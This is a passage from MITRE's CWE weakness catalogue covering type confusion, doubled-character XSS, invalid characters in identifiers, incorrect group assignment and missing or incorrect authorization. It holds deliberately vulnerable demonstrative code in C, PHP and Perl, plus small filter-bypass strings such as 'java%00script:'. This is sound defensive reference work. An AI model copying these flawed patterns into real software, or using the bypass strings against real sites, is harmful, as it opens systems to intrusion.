CVE-2003-0777 + Chain: product does not properly handle dropped connections, leading to missing NULL terminator (CWE-170) and segmentation fault. + https://www.cve.org/CVERecord?id=CVE-2003-0777 + + + CVE-2005-3327 + Chain: Authentication bypass by skipping the first startup step as required by the protocol. + https://www.cve.org/CVERecord?id=CVE-2005-3327 + + + CVE-2004-0829 + Chain: File server crashes when sent a "find next" request without an initial "find first." + https://www.cve.org/CVERecord?id=CVE-2004-0829 + + + CVE-2010-2620 + FTP server allows remote attackers to bypass authentication by sending (1) LIST, (2) RETR, (3) STOR, or other commands without performing the required login steps first. + https://www.cve.org/CVERecord?id=CVE-2010-2620 + + + CVE-2005-3296 + FTP server allows remote attackers to list arbitrary directories as root by running the LIST command before logging in. + https://www.cve.org/CVERecord?id=CVE-2005-3296 + + + + + 40 + Insufficient Process Validation + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + This weakness is typically associated with business logic flaws, except when it produces resultant weaknesses. + The classification of business logic flaws has been under-studied, although exploitation of business flaws frequently happens in real-world systems, and many applied vulnerability researchers investigate them. The greatest focus is in web applications. There is debate within the community about whether these problems represent particularly new concepts, or if they are variations of well-known principles. + Many business logic flaws appear to be oriented toward business processes, application flows, and sequences of behaviors, which are not as well-represented in CWE as weaknesses related to input validation, memory management, etc. + + + + + CWE Content Team + MITRE + 2011-03-24 + 1.12 + 2011-03-30 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences, Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Anonymous External Contributor + 2021-11-11 + Reported an error in a demonstrative example + + + + + The product or the administrator places a user into an incorrect group. + If the incorrect group has more access or privileges than the intended group, the user might be able to bypass intended security policy to access unexpected resources or perform unexpected actions. The access-control system might not be able to detect malicious usage of this group membership. + + + + + + + + + Implementation + + + Operation + + + + + Access Control + Gain Privileges or Assume Identity + + + + + CVE-1999-1193 + Operating system assigns user to privileged wheel group, allowing the user to gain root privileges. + https://www.cve.org/CVERecord?id=CVE-1999-1193 + + + CVE-2010-3716 + Chain: drafted web request allows the creation of users with arbitrary group membership. + https://www.cve.org/CVERecord?id=CVE-2010-3716 + + + CVE-2008-5397 + Chain: improper processing of configuration options causes users to contain unintended group memberships. + https://www.cve.org/CVERecord?id=CVE-2008-5397 + + + CVE-2007-6644 + CMS does not prevent remote administrators from promoting other users to the administrator group, in violation of the intended security model. + https://www.cve.org/CVERecord?id=CVE-2007-6644 + + + CVE-2007-3260 + Product assigns members to the root group, allowing escalation of privileges. + https://www.cve.org/CVERecord?id=CVE-2007-3260 + + + CVE-2002-0080 + Chain: daemon does not properly clear groups before dropping privileges. + https://www.cve.org/CVERecord?id=CVE-2002-0080 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2011-03-24 + 1.12 + 2011-03-30 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type. + + When the product accesses the resource using an incompatible type, this could trigger logical errors because the resource does not have expected properties. In languages without memory safety, such as C and C++, type confusion can lead to out-of-bounds memory access. + While this weakness is frequently associated with unions when parsing data with many different embedded object types in C, it can be present in any application that can interpret the same variable or memory location in multiple ways. + This weakness is not unique to C and C++. For example, errors in PHP applications can be triggered by providing array parameters when scalars are expected, or vice versa. Languages such as Perl, which perform automatic conversion of a variable of one type when it is accessed as if it were another type, can also contain these issues. + + + + + + + + + + + + + Object Type Confusion + + + + + Implementation + + + + + Availability + Integrity + Confidentiality + Read Memory + Modify Memory + Execute Unauthorized Code or Commands + DoS: Crash, Exit, or Restart + When a memory buffer is accessed using the wrong type, it could read or write memory out of the bounds of the buffer, if the allocated buffer is smaller than the type that the code is attempting to access, leading to a crash and possibly code execution. + + + + + The following code uses a union to support the representation of different types of messages. It formats messages differently, depending on their type. + + #define NAME_TYPE 1#define ID_TYPE 2 + struct MessageBuffer{int msgType;union {char *name;int nameID;};}; + + int main (int argc, char **argv) { + struct MessageBuffer buf;char *defaultMessage = "Hello World"; + buf.msgType = NAME_TYPE;buf.name = defaultMessage;printf("Pointer of buf.name is %p\n", buf.name); + /* This particular value for nameID is used to make the code architecture-independent. If coming from untrusted input, it could be any value. */ + + buf.nameID = (int)(defaultMessage + 1);printf("Pointer of buf.name is now %p\n", buf.name);if (buf.msgType == NAME_TYPE) {printf("Message: %s\n", buf.name);}else {printf("Message: Use ID %d\n", buf.nameID);} + } + + The code intends to process the message as a NAME_TYPE, and sets the default message to "Hello World." However, since both buf.name and buf.nameID are part of the same union, they can act as aliases for the same memory location, depending on memory layout after compilation. + As a result, modification of buf.nameID - an int - can effectively modify the pointer that is stored in buf.name - a string. + Execution of the program might generate output such as: + + + Pointer of name is 10830 + Pointer of name is now 10831 + Message: ello World + + + Notice how the pointer for buf.name was changed, even though buf.name was not explicitly modified. + In this case, the first "H" character of the message is omitted. However, if an attacker is able to fully control the value of buf.nameID, then buf.name could contain an arbitrary pointer, leading to out-of-bounds reads or writes. + + + The following PHP code accepts a value, adds 5, and prints the sum. + + $value = $_GET['value'];$sum = $value + 5;echo "value parameter is '$value'<p>";echo "SUM is $sum"; + + When called with the following query string: + + + value=123 + + + the program calculates the sum and prints out: + + + SUM is 128 + + + However, the attacker could supply a query string such as: + + + value[]=123 + + + The "[]" array syntax causes $value to be treated as an array type, which then generates a fatal error when calculating $sum: + + + Fatal error: Unsupported operand types in program.php on line 2 + + + + + The following Perl code is intended to look up the privileges for user ID's between 0 and 3, by performing an access of the $UserPrivilegeArray reference. It is expected that only userID 3 is an admin (since this is listed in the third element of the array). + + my $UserPrivilegeArray = ["user", "user", "admin", "user"]; + my $userID = get_current_user_ID(); + if ($UserPrivilegeArray eq "user") {print "Regular user!\n";}else {print "Admin!\n";} + print "\$UserPrivilegeArray = $UserPrivilegeArray\n"; + + In this case, the programmer intended to use "$UserPrivilegeArray->{$userID}" to access the proper position in the array. But because the subscript was omitted, the "user" string was compared to the scalar representation of the $UserPrivilegeArray reference, which might be of the form "ARRAY(0x229e8)" or similar. + Since the logic also "fails open" (CWE-636), the result of this bug is that all users are assigned administrator privileges. + While this is a forced example, it demonstrates how type confusion can have security consequences, even in memory-safe languages. + + + + + CVE-2010-4577 + Type confusion in CSS sequence leads to out-of-bounds read. + https://www.cve.org/CVERecord?id=CVE-2010-4577 + + + CVE-2011-0611 + Size inconsistency allows code execution, first discovered when it was actively exploited in-the-wild. + https://www.cve.org/CVERecord?id=CVE-2011-0611 + + + CVE-2010-0258 + Improperly-parsed file containing records of different types leads to code execution when a memory location is interpreted as a different object than intended. + https://www.cve.org/CVERecord?id=CVE-2010-0258 + + + + + EXP39-C + Do not access a variable through a pointer of an incompatible type + Exact + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + This weakness is possible in any type-unsafe programming language. + + + Type confusion weaknesses have received some attention by applied researchers and major software vendors for C and C++ code. Some publicly-reported vulnerabilities probably have type confusion as a root-cause weakness, but these may be described as "memory corruption" instead. + For other languages, there are very few public reports of type confusion weaknesses. These are probably under-studied. Since many programs rely directly or indirectly on loose typing, a potential "type confusion" behavior might be intentional, possibly requiring more manual analysis. + + + + + CWE Content Team + MITRE + 2011-05-15 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2012-05-11 + updated References + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The web application does not filter user-controlled input for executable script disguised using doubling of the involved characters. + + + + + + + Primary + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Read Application Data + Execute Unauthorized Code or Commands + + + + + Implementation + Resolve all filtered input to absolute or canonical representations before processing. + + + Implementation + Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. + + + Implementation + Output Encoding + + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. + + + + Implementation + With Struts, write all data from form beans with the bean's filter attribute set to true. + + + Implementation + Attack Surface Reduction + To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. + Defense in Depth + + + + + CVE-2002-2086 + XSS using "<script". + https://www.cve.org/CVERecord?id=CVE-2002-2086 + + + CVE-2000-0116 + Encoded "javascript" in IMG tag. + https://www.cve.org/CVERecord?id=CVE-2000-0116 + + + CVE-2001-1157 + Extra "<" in front of SCRIPT tag. + https://www.cve.org/CVERecord?id=CVE-2001-1157 + + + + + DOUBLE - Doubled character XSS manipulations, e.g. "<script" + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not neutralize or incorrectly neutralizes invalid characters or byte sequences in the middle of tag names, URI schemes, and other identifiers. + Some web browsers may remove these sequences, resulting in output that may have unintended control implications. For example, the product may attempt to remove a "javascript:" URI scheme, but a "java%00script:" URI may bypass this check and still be rendered as active javascript by some browsers, allowing XSS or other attacks. + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Read Application Data + Execute Unauthorized Code or Commands + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Output Encoding + + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. + + + + Implementation + Attack Surface Reduction + To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. + Defense in Depth + + + + + CVE-2004-0595 + XSS filter doesn't filter null characters before looking for dangerous tags, which are ignored by web browsers. Multiple Interpretation Error (MIE) and validate-before-cleanse. + https://www.cve.org/CVERecord?id=CVE-2004-0595 + + + + + Invalid Characters in Identifiers + + + SFP24 + Tainted input to command + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Name, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Invalid Characters in Identifiers + Failure to Sanitize Invalid Characters in Identifiers in Web Pages + + + + The product does not perform an authorization check when an actor attempts to access a resource or perform an action. + + Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource. + When access control checks are not applied, users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution. + + + + + + + + + + + + An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: "No access", "Read access", "Change access", and "Full control". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object. + + + + AuthZ + "AuthZ" is typically used as an abbreviation of "authorization" within the web application security community. It is distinct from "AuthN" (or, sometimes, "AuthC") which is an abbreviation of "authentication." The use of "Auth" as an abbreviation is discouraged, since it could be used for either authentication or authorization. + + + + + Architecture and Design + + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + Authorization weaknesses may arise when a single-user application is ported to a multi-user environment. + + + + Implementation + A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies. + + + Operation + + + High + + + Confidentiality + Read Application Data + Read Files or Directories + An attacker could read sensitive data, either by reading the data directly from a data store that is not restricted, or by accessing insufficiently-protected, privileged functionality to read the data. + + + Integrity + Modify Application Data + Modify Files or Directories + An attacker could modify sensitive data, either by writing the data directly to a data store that is not restricted, or by accessing insufficiently-protected, privileged functionality to write the data. + + + Access Control + Gain Privileges or Assume Identity + Bypass Protection Mechanism + An attacker could gain privileges by modifying or reading critical data directly, or by accessing privileged functionality. + + + + + Automated Static Analysis + + Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries. + Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives. + + Limited + + + Automated Dynamic Analysis + Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic. + + + Manual Analysis + + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms. + + Moderate + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints. + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Host Application Interface Scanner + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + + + High + + + + + Architecture and Design + + Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries. + Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role. + + + + Architecture and Design + Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7]. + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]. + + + + Architecture and Design + + For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page. + One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page. + + + + System Configuration + Installation + Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs. + + + + + This function runs an arbitrary SQL query on a given database, returning the result of the query. + + function runEmployeeQuery($dbName, $name){mysql_select_db($dbName,$globalDbHandle) or die("Could not open Database".$dbName); + //Use a prepared statement to avoid CWE-89 + $preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name');$preparedStatement->execute(array(':name' => $name));return $preparedStatement->fetchAll();} + /.../ + + $employeeRecord = runEmployeeQuery('EmployeeDB',$_GET['EmployeeName']); + + While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database. + + + The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory. + + sub DisplayPrivateMessage {my($id) = @_;my $Message = LookupMessageObject($id);print "From: " . encodeHTML($Message->{from}) . "<br>\n";print "Subject: " . encodeHTML($Message->{subject}) . "\n";print "<hr>\n";print "Body: " . encodeHTML($Message->{body}) . "\n";} + my $q = new CGI; + # For purposes of this example, assume that CWE-309 and + + + + # CWE-523 do not apply. + if (! AuthenticateUser($q->param('username'), $q->param('password'))) {ExitError("invalid username or password");} + my $id = $q->param('id');DisplayPrivateMessage($id); + + While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users. + One way to avoid this problem would be to ensure that the "to" field in the message object matches the username of the authenticated user. + + + + + CVE-2022-24730 + Go-based continuous deployment product does not check that a user has certain privileges to update or create an app, allowing adversaries to read sensitive repository information + https://www.cve.org/CVERecord?id=CVE-2022-24730 + + + CVE-2009-3168 + Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords. + https://www.cve.org/CVERecord?id=CVE-2009-3168 + + + CVE-2009-3597 + Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request. + https://www.cve.org/CVERecord?id=CVE-2009-3597 + + + CVE-2009-2282 + Terminal server does not check authorization for guest access. + https://www.cve.org/CVERecord?id=CVE-2009-2282 + + + CVE-2008-5027 + System monitoring software allows users to bypass authorization by creating custom forms. + https://www.cve.org/CVERecord?id=CVE-2008-5027 + + + CVE-2009-3781 + Content management system does not check access permissions for private files, allowing others to view those files. + https://www.cve.org/CVERecord?id=CVE-2009-3781 + + + CVE-2008-6548 + Product does not check the ACL of a page accessed using an "include" directive, allowing attackers to read unauthorized files. + https://www.cve.org/CVERecord?id=CVE-2008-6548 + + + CVE-2009-2960 + Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users. + https://www.cve.org/CVERecord?id=CVE-2009-2960 + + + CVE-2009-3230 + Database server does not use appropriate privileges for certain sensitive operations. + https://www.cve.org/CVERecord?id=CVE-2009-3230 + + + CVE-2009-2213 + Gateway uses default "Allow" configuration for its authorization settings. + https://www.cve.org/CVERecord?id=CVE-2009-2213 + + + CVE-2009-0034 + Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges. + https://www.cve.org/CVERecord?id=CVE-2009-0034 + + + CVE-2008-6123 + Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect. + https://www.cve.org/CVERecord?id=CVE-2008-6123 + + + CVE-2008-7109 + Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client. + https://www.cve.org/CVERecord?id=CVE-2008-7109 + + + CVE-2008-3424 + Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access. + https://www.cve.org/CVERecord?id=CVE-2008-3424 + + + CVE-2005-1036 + Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap + https://www.cve.org/CVERecord?id=CVE-2005-1036 + + + CVE-2008-4577 + ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions. + https://www.cve.org/CVERecord?id=CVE-2008-4577 + + + CVE-2007-2925 + Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries. + https://www.cve.org/CVERecord?id=CVE-2007-2925 + + + CVE-2006-6679 + Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header. + https://www.cve.org/CVERecord?id=CVE-2006-6679 + + + CVE-2005-3623 + OS kernel does not check for a certain privilege before setting ACLs for files. + https://www.cve.org/CVERecord?id=CVE-2005-3623 + + + CVE-2005-2801 + Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied. + https://www.cve.org/CVERecord?id=CVE-2005-2801 + + + CVE-2001-1155 + Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions. + https://www.cve.org/CVERecord?id=CVE-2001-1155 + + + CVE-2020-17533 + Chain: unchecked return value (CWE-252) of some functions for policy enforcement leads to authorization bypass (CWE-862) + https://www.cve.org/CVERecord?id=CVE-2020-17533 + + + + + Part 2-1 + Req 4.3.3.7 + + + Part 3-3 + Req SR 2.1 + + + Part 4-2 + Req CR 2.1 + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2011-06-27 + updated Demonstrative_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Alternate_Terms, Observed_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships, Taxonomy_Mappings + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + + + + The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions. + + Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource. + When access control checks are incorrectly applied, users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution. + + + + + + + + + + + + An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: "No access", "Read access", "Change access", and "Full control". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups 